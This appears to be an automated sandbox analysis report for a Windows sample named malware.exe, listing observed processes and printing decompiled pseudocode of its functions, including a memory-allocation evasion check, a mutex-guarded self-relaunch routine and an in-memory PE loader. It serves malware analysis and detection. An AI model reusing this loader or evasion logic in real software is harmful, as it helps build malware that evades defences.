Chronological Activities

Analysis Process: svchost.exe PID: 5684 Parent PID: 568

General

Start time:	22:48:55
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2392 Parent PID: 568

General

Start time:	22:49:06
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2992 Parent PID: 568

General

Start time:	22:49:06
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2432 Parent PID: 568

General

Start time:	22:49:07
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5732 Parent PID: 568

General

Start time:	22:49:08
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 772 Parent PID: 568

General

Start time:	22:49:08
Start date:	11/04/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff77f280000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5248 Parent PID: 568

General

Start time:	22:49:09
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 1968 Parent PID: 5248

General

Start time:	22:50:09
Start date:	11/04/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff672490000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4912 Parent PID: 1968

General

Start time:	22:50:10
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: malware.exe PID: 160 Parent PID: 5744 malware.exeCOMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	533
Total number of Limit Nodes:	3

Executed Functions

Function 000515B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E000515B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E000519E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E00051830(0x51004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0x5c200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E00051830(0x51000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0x5c200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E00059C50(0x51000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x000515c9
0x000515cf
0x000515d5
0x000515d9
0x000515df
0x000515ef
0x000515f4
0x00051602
0x00051615
0x0005162e
0x00051633
0x00051641
0x00051654
0x0005166d
0x00051671
0x00051692
0x00051698
0x00051673
0x0005167e
0x00051684
0x00051688
0x000516a4
0x000516d3
0x000516dc
0x000516e6
0x00051707
0x0005170f
0x00000000
0x00051711
0x00051714
0x0005171d
0x00051726
0x0005172d
0x00051734
0x00051744
0x00051744
0x000516a6
0x000516a7
0x000516ae
0x000516b5
0x000516bb
0x000516ca
0x000516ca
0x0005168a
0x0005168b
0x00000000
0x0005168b
0x00051688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 000515C9

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

_snwprintf.NTDLL ref: 00051602
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005160E
HeapFree.KERNEL32(00000000), ref: 00051615
_snwprintf.NTDLL ref: 00051641
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005164D
HeapFree.KERNEL32(00000000), ref: 00051654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00051667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0005167E
CloseHandle.KERNEL32(00000000), ref: 0005168B
GetLastError.KERNEL32 ref: 00051699
SetEvent.KERNEL32(00000000), ref: 000516A7
CloseHandle.KERNEL32(00000000), ref: 000516AE
CloseHandle.KERNEL32(00000000), ref: 000516B5
memset.NTDLL ref: 000516D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00051707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00051714
CloseHandle.KERNEL32(?), ref: 0005171D
CloseHandle.KERNEL32(?), ref: 00051726
CloseHandle.KERNEL32(00000000), ref: 0005172D
CloseHandle.KERNEL32(00000000), ref: 00051734

Strings

D, xrefs: 000516DC

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: D
API String ID: 2830143876-2746444292
Opcode ID: e9edb2911cd9fe2c278f0432985e929037abb57076701e3893cd4de86d977a04
Instruction ID: 6146799838f3c81e364e2a9428323fa2e6b94797a574bae72488469e6d98f93b
Opcode Fuzzy Hash: e9edb2911cd9fe2c278f0432985e929037abb57076701e3893cd4de86d977a04
Instruction Fuzzy Hash: 3E415975900718AFFB10ABA4DC09FEF7B7CEB46713F040055FA09E6191DA789A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00051599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00051599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E000519E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E00051830(0x51004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0x5c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E00051830(0x51000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0x5c200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E00059C50(0x51000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x00051599
0x0005159d
0x000515a5
0x000515a6
0x000515a9
0x000515c9
0x000515cf
0x000515d5
0x000515d9
0x000515df
0x000515ef
0x000515f4
0x00051602
0x00051615
0x0005162e
0x00051633
0x00051641
0x00051654
0x0005166d
0x00051671
0x00051691
0x00051698
0x00051673
0x0005167e
0x00051684
0x00051688
0x000516a4
0x000516d3
0x000516dc
0x000516e6
0x00051707
0x0005170f
0x00000000
0x00051711
0x00051714
0x0005171d
0x00051726
0x0005172d
0x00051734
0x00051744
0x00051744
0x000516a6
0x000516a7
0x000516ae
0x000516b5
0x000516bb
0x000516ca
0x000516ca
0x0005168a
0x0005168b
0x00000000
0x0005168b
0x00051688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 000515C9

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

_snwprintf.NTDLL ref: 00051602
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005160E
HeapFree.KERNEL32(00000000), ref: 00051615
_snwprintf.NTDLL ref: 00051641
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005164D
HeapFree.KERNEL32(00000000), ref: 00051654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00051667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0005167E
CloseHandle.KERNEL32(00000000), ref: 0005168B
GetLastError.KERNEL32 ref: 00051699
SetEvent.KERNEL32(00000000), ref: 000516A7
CloseHandle.KERNEL32(00000000), ref: 000516AE
CloseHandle.KERNEL32(00000000), ref: 000516B5

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: 62e9b1ef611c6761a4c2035bf24a32233017d8162b08a3da1b12c1bafe023d9c
Instruction ID: b28e0848d9e67eaf4fd4c17d5dc08426e3bcce67bb00e6827f70c3a222aa4ecc
Opcode Fuzzy Hash: 62e9b1ef611c6761a4c2035bf24a32233017d8162b08a3da1b12c1bafe023d9c
Instruction Fuzzy Hash: E921D331640604BFFB209BA0CC0EFDB3B7DEB85713F044091FA09E6181DA349A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00051575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00051575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E00051830(0x51004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0x5c200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E00051830(0x51000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0x5c200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E00059C50(0x51000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x00051575
0x00051575
0x00051575
0x00051575
0x00051575
0x0005157b
0x0005157e
0x00051580
0x00051585
0x00000000
0x00000000
0x00051587
0x00051587
0x0005158a
0x0005158c
0x0005158f
0x00051591
0x00051592
0x00051593
0x00051594
0x00051594
0x00051594
0x000515d9
0x000515d9
0x000515df
0x000515ef
0x000515f4
0x00051602
0x00051615
0x0005162e
0x00051633
0x00051641
0x00051654
0x0005166d
0x00051671
0x00051691
0x00051698
0x00051673
0x0005167e
0x00051684
0x00051688
0x000516a4
0x000516d3
0x000516dc
0x000516e6
0x00051707
0x0005170f
0x00000000
0x00051711
0x00051714
0x0005171d
0x00051726
0x0005172d
0x00051734
0x00051744
0x00051744
0x000516a6
0x000516a7
0x000516ae
0x000516b5
0x000516bb
0x000516ca
0x000516ca
0x0005168a
0x0005168b
0x00000000
0x0005168b
0x00051688

APIs

_snwprintf.NTDLL ref: 00051602
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005160E
HeapFree.KERNEL32(00000000), ref: 00051615
_snwprintf.NTDLL ref: 00051641
GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005164D
HeapFree.KERNEL32(00000000), ref: 00051654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00051667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0005167E
CloseHandle.KERNEL32(00000000), ref: 0005168B

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: 378a582a3453b50f606d4c0fc97365f14e0311dd5d38d88a6e0af20f66fc357e
Instruction ID: 0f7e1ded6f2aceeae5cfb67dcf7b4067f6f4d9ffa356b64ff585dbeee1e81018
Opcode Fuzzy Hash: 378a582a3453b50f606d4c0fc97365f14e0311dd5d38d88a6e0af20f66fc357e
Instruction Fuzzy Hash: B521A471504755AFFB609BA19C0DFDB3B6CEB46713F040091FE09EA182DA748A45C765

Uniqueness

Uniqueness Score: -1.00%

Function 00059EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E00051B10(E00051BE0(0xd22e2014), 0x511f0, 9, 0x3966646c, 0x5c1f0);
				E00051B10(E00051BE0(0x8f7ee672), 0x510d0, 0x48, 0x6677a1d2, 0x5c0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E000515B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x00059efe
0x00059f23
0x00059f39
0x00059f3f
0x00059f43
0x00059f4d
0x00059f60
0x00059f66
0x00059f66
0x00059f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00059F32
RtlAllocateHeap.NTDLL(00000000), ref: 00059F39
memset.NTDLL ref: 00059F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00059F59
RtlFreeHeap.NTDLL(00000000), ref: 00059F60

Part of subcall function 000515B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 000515C9
Part of subcall function 000515B0: _snwprintf.NTDLL ref: 00051602
Part of subcall function 000515B0: GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005160E
Part of subcall function 000515B0: HeapFree.KERNEL32(00000000), ref: 00051615
Part of subcall function 000515B0: _snwprintf.NTDLL ref: 00051641
Part of subcall function 000515B0: GetProcessHeap.KERNEL32(00000000,00059F6B), ref: 0005164D
Part of subcall function 000515B0: HeapFree.KERNEL32(00000000), ref: 00051654
Part of subcall function 000515B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00051667
Part of subcall function 000515B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0005167E
Part of subcall function 000515B0: CloseHandle.KERNEL32(00000000), ref: 0005168B

ExitProcess.KERNEL32 ref: 00059F6D

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: 230ffcdaeeb8d51bde44a6880e1a1de90912a73cfa9203c52b1c36af5526a3e8
Instruction ID: 96f3c78a119b5e23b7b2e5426d5de2e66c5ecbc5683989e69ea079c001eede28
Opcode Fuzzy Hash: 230ffcdaeeb8d51bde44a6880e1a1de90912a73cfa9203c52b1c36af5526a3e8
Instruction Fuzzy Hash: 80F06230785B007FF61033B46C2FFCB39154B42B43F104420BE06AE2D7EEA9480886AD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00051F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00051F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x00051f47
0x00051f4a
0x00051f4f
0x00052105
0x0005210b
0x00051f63
0x00051f67
0x00051f69
0x00051f72
0x00052103
0x00000000
0x00051f87
0x00051f98
0x00051f9c
0x00051fa7
0x00051fb1
0x00051fb4
0x00051fba
0x00051fc3
0x00051fc6
0x00051fcb
0x00051fd0
0x00051fd0
0x00051fd9
0x00051fe7
0x00051fed
0x00051ff0
0x00051ff3
0x00051ff8
0x00051ff8
0x00052006
0x00052008
0x00052011
0x00052013
0x00052018
0x00052020
0x00052023
0x00052026
0x00052028
0x0005202b
0x00052030
0x00052032
0x00052032
0x00052042
0x00052049
0x0005204e
0x0005204e
0x00052051
0x00052054
0x00052058
0x00052058
0x0005205b
0x0005205d
0x00052062
0x00052062
0x00052065
0x0005206d
0x00052080
0x00052083
0x00052086
0x0005208b
0x00052090
0x00052099
0x0005209b
0x000520a0
0x00000000
0x00000000
0x000520a7
0x000520a9
0x000520ab
0x000520ad
0x000520af
0x000520da
0x000520dd
0x000520e0
0x000520e3
0x000520e8
0x00000000
0x000520ea
0x000520f2
0x000520f2
0x000520b1
0x00000000
0x000520b1
0x000520b1
0x000520bb
0x000520b3
0x000520b3
0x000520b3
0x000520bf
0x000520c7
0x00000000
0x00000000
0x000520c9
0x000520cc
0x000520cf
0x000520d1
0x000520d4
0x000520d8
0x00000000
0x00000000
0x00000000
0x00000000
0x000520d8
0x00000000
0x000520af
0x000520fb
0x00052101
0x00052101
0x0005208b
0x0005206d
0x00000000
